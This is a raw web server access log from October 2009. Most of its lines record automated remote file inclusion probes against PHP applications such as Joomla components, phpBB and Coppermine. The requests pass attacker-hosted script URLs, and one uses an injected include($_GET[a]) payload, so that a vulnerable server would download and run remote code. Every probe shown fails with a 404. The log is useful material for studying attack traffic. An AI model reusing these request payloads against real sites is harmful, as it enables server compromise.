189.84.117.106 - - [18/Oct/2009:03:56:37 -0400] "GET /logs/error_log.Q109060500/index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
189.84.117.106 - - [18/Oct/2009:03:56:37 -0400] "GET /index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 207 "-" "libwww-perl/5.808"
189.84.117.106 - - [18/Oct/2009:03:56:38 -0400] "GET /logs/index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 212 "-" "libwww-perl/5.808"
65.38.18.81 - - [18/Oct/2009:03:56:41 -0400] "GET //oneadmin/newspublish/include.php?path[docroot]=http://triton.100free.com/mic22? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:03:56:47 -0400] "GET //oneadmin/newspublish/include.php?path[docroot]=http://triton.100free.com/mic22? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
201.66.112.34 - - [18/Oct/2009:03:56:53 -0400] "GET /logs/error_log.Q109060500/index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
201.66.112.34 - - [18/Oct/2009:03:56:53 -0400] "GET /index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
201.66.112.34 - - [18/Oct/2009:03:56:54 -0400] "GET /logs/index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
72.30.78.230 - - [18/Oct/2009:03:56:43 -0400] "GET /logs/access_log.Q109080800 HTTP/1.0" 200 2589826 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.242.37.212 - - [18/Oct/2009:03:57:35 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:03:57:35 -0400] "GET /logs/error_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:03:57:42 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:03:57:42 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [18/Oct/2009:03:57:53 -0400] "GET /logs/access_log.Q109093000///index.php?p=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:03:58:25 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:03:58:25 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:03:58:25 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:03:58:25 -0400] "GET /logs/error_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:03:58:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.143.3.188 - - [18/Oct/2009:03:58:36 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
174.143.3.188 - - [18/Oct/2009:03:58:37 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
174.143.3.188 - - [18/Oct/2009:03:58:37 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
174.143.3.188 - - [18/Oct/2009:03:58:37 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
89.171.190.107 - - [18/Oct/2009:03:58:41 -0400] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://www.masuccessguy.com//pdf/1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
89.171.190.107 - - [18/Oct/2009:03:58:43 -0400] "GET /logs/access_log.Q109060300/components/com_performs/performs.php?mosConfig_absolute_path=http://www.masuccessguy.com//pdf/1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
89.171.190.107 - - [18/Oct/2009:03:58:44 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.masuccessguy.com//pdf/1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.171.190.107 - - [18/Oct/2009:03:58:44 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.masuccessguy.com//pdf/1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
195.210.57.83 - - [18/Oct/2009:03:58:46 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler)"
195.210.57.83 - - [18/Oct/2009:03:58:46 -0400] "GET /logs/access_log.Q108060500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler)"
201.66.112.34 - - [18/Oct/2009:04:00:00 -0400] "GET /logs/access_log.Q109060500/index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
77.242.37.212 - - [18/Oct/2009:04:00:14 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:04:00:14 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:04:00:14 -0400] "GET /logs/error_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:04:00:14 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
189.84.117.106 - - [18/Oct/2009:04:00:26 -0400] "GET /logs/access_log.Q109060500/index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
125.251.147.194 - - [18/Oct/2009:04:00:58 -0400] "GET //skin/uks_gallery_v3021/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:04:00:58 -0400] "GET /logs//skin/uks_gallery_v3021/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:04:00:58 -0400] "GET /logs/access_log.Q109081100%20%20//skin/uks_gallery_v3021/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
218.234.21.178 - - [18/Oct/2009:04:01:01 -0400] "GET /logs/access_log.Q109071100//bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.misterplasma.be/htaccess.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
218.234.21.178 - - [18/Oct/2009:04:01:01 -0400] "GET //bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.misterplasma.be/htaccess.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
218.234.21.178 - - [18/Oct/2009:04:01:01 -0400] "GET /logs//bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.misterplasma.be/htaccess.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
80.247.164.121 - - [18/Oct/2009:04:01:04 -0400] "GET /logs/access_log.Q109052100/SSI.php?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
80.247.164.121 - - [18/Oct/2009:04:01:04 -0400] "GET /logs/error_log.Q109081800/SSI.php?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:04:01:05 -0400] "GET /logs/error_log.Q109081100%20%20//skin/uks_gallery_v3021/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
66.249.71.152 - - [18/Oct/2009:04:01:16 -0400] "GET /logs/access_log.Q109060800 HTTP/1.1" 200 4780020 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.171.190.107 - - [18/Oct/2009:04:02:26 -0400] "GET /logs/access_log.Q109070700%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.masuccessguy.com//pdf/1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
89.171.190.107 - - [18/Oct/2009:04:02:27 -0400] "GET /logs/access_log.Q109060300%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.masuccessguy.com//pdf/1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.234.21.178 - - [18/Oct/2009:04:02:31 -0400] "GET /logs/error_log.Q109071100//bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.misterplasma.be/htaccess.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
125.251.147.194 - - [18/Oct/2009:04:03:13 -0400] "GET /logs/access_log.Q109081100//skin/uks_gallery_v3021/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:04:03:20 -0400] "GET /logs/error_log.Q109081100//skin/uks_gallery_v3021/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
65.38.18.81 - - [18/Oct/2009:04:03:39 -0400] "GET /logs/access_log.Q109051100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://triton.100free.com/mic22? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:03:39 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://triton.100free.com/mic22? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:03:40 -0400] "GET /logs/access_log.Q109051100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://triton.100free.com/mic22? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:03:40 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://triton.100free.com/mic22? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:03:43 -0400] "GET /logs/access_log.Q109062900//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://triton.100free.com/mic22? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:03:46 -0400] "GET /logs/access_log.Q109062900//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://triton.100free.com/mic22? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
209.59.12.99 - - [18/Oct/2009:04:04:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.251.147.194 - - [18/Oct/2009:04:04:45 -0400] "GET //skin/uks_gallery_v3021/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:04:04:45 -0400] "GET /logs/access_log.Q109081100%20%20//skin/uks_gallery_v3021/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:04:04:45 -0400] "GET /logs//skin/uks_gallery_v3021/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:04:04:52 -0400] "GET /logs/error_log.Q109081100%20%20//skin/uks_gallery_v3021/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
89.171.190.107 - - [18/Oct/2009:04:04:57 -0400] "GET /logs/access_log.Q109062000//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://google.com/webmasters? HTTP/1.1" 404 282 "-" "libwww-perl/5.820"
89.171.190.107 - - [18/Oct/2009:04:04:57 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://google.com/webmasters? HTTP/1.1" 404 255 "-" "libwww-perl/5.820"
89.171.190.107 - - [18/Oct/2009:04:04:58 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://google.com/webmasters? HTTP/1.1" 404 260 "-" "libwww-perl/5.820"
72.11.145.8 - - [18/Oct/2009:04:05:57 -0400] "GET /logs/error_log.Q109092700///index.php?p=http://www.birdmobile.net/sempak.jpg%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
72.11.145.8 - - [18/Oct/2009:04:05:57 -0400] "GET /logs///index.php?p=http://www.birdmobile.net/sempak.jpg%0D?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
72.11.145.8 - - [18/Oct/2009:04:05:57 -0400] "GET ///index.php?p=http://www.birdmobile.net/sempak.jpg%0D?? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
72.11.145.8 - - [18/Oct/2009:04:05:58 -0400] "GET /logs/error_log.Q109060500///index.php?p=http://www.birdmobile.net/sempak.jpg%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
89.171.190.107 - - [18/Oct/2009:04:06:59 -0400] "GET /logs/access_log.Q109071200//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://google.com/webmasters? HTTP/1.1" 404 282 "-" "libwww-perl/5.820"
89.171.190.107 - - [18/Oct/2009:04:07:01 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://google.com/webmasters? HTTP/1.1" 404 255 "-" "libwww-perl/5.820"
125.251.147.194 - - [18/Oct/2009:04:07:27 -0400] "GET /logs/access_log.Q109081100//skin/uks_gallery_v3021/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:04:07:28 -0400] "GET /logs/error_log.Q109081100//skin/uks_gallery_v3021/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:04:09:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
82.151.132.176 - - [18/Oct/2009:04:10:17 -0400] "GET //phpAdsNew/view.inc.php?=http://dubnahome.ru//one.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
82.151.132.176 - - [18/Oct/2009:04:10:17 -0400] "GET /logs//phpAdsNew/view.inc.php?=http://dubnahome.ru//one.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
82.151.132.176 - - [18/Oct/2009:04:10:22 -0400] "GET /logs/access_log.Q109052400%20%20//phpAdsNew/view.inc.php?=http://dubnahome.ru//one.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:04:10:49 -0400] "GET /logs/error_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
174.143.3.188 - - [18/Oct/2009:04:10:51 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
174.143.3.188 - - [18/Oct/2009:04:10:51 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
174.143.3.188 - - [18/Oct/2009:04:10:51 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
174.143.3.188 - - [18/Oct/2009:04:10:51 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.242.37.212 - - [18/Oct/2009:04:10:56 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
88.55.109.165 - - [18/Oct/2009:04:10:57 -0400] "GET /index.php?pag=http://fffmatheus.justfree.com/safeof.txt??????? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
66.228.136.80 - - [18/Oct/2009:04:11:12 -0400] "GET /logs/access_log.Q109081700%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
66.228.136.80 - - [18/Oct/2009:04:11:12 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
66.228.136.80 - - [18/Oct/2009:04:11:12 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
82.151.132.176 - - [18/Oct/2009:04:11:28 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://dubnahome.ru//one.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
82.151.132.176 - - [18/Oct/2009:04:11:28 -0400] "GET /logs/access_log.Q109052200%20%20//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://dubnahome.ru//one.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
82.151.132.176 - - [18/Oct/2009:04:11:28 -0400] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://dubnahome.ru//one.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
119.63.199.28 - - [18/Oct/2009:04:11:41 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
82.193.15.3 - - [18/Oct/2009:04:11:41 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.228.136.80 - - [18/Oct/2009:04:11:48 -0400] "GET /logs/access_log.Q109082100%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
190.97.219.4 - - [18/Oct/2009:04:13:02 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
190.97.219.4 - - [18/Oct/2009:04:13:02 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
190.97.219.4 - - [18/Oct/2009:04:13:02 -0400] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
190.97.219.4 - - [18/Oct/2009:04:13:11 -0400] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
190.97.219.4 - - [18/Oct/2009:04:13:20 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
190.97.219.4 - - [18/Oct/2009:04:13:20 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
190.97.219.4 - - [18/Oct/2009:04:13:41 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
190.97.219.4 - - [18/Oct/2009:04:13:51 -0400] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
190.97.219.4 - - [18/Oct/2009:04:13:51 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
190.97.219.4 - - [18/Oct/2009:04:13:53 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
190.97.219.4 - - [18/Oct/2009:04:13:56 -0400] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:04:14:02 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:04:14:02 -0400] "GET /logs/error_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:04:14:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.97.219.4 - - [18/Oct/2009:04:14:08 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
190.97.219.4 - - [18/Oct/2009:04:14:09 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
87.104.34.140 - - [18/Oct/2009:04:14:12 -0400] "GET /logs/access_log.Q109063000//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://ownzz.100free.com/idzim.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
119.63.193.55 - - [18/Oct/2009:04:14:12 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
110.45.147.248 - - [18/Oct/2009:04:14:12 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
110.45.147.248 - - [18/Oct/2009:04:14:12 -0400] "GET /logs/access_log.Q109081300/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
110.45.147.248 - - [18/Oct/2009:04:14:12 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
110.45.147.248 - - [18/Oct/2009:04:14:12 -0400] "GET /logs/access_log.Q109072000/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
87.104.34.140 - - [18/Oct/2009:04:14:12 -0400] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://ownzz.100free.com/idzim.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
87.104.34.140 - - [18/Oct/2009:04:14:12 -0400] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://ownzz.100free.com/idzim.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
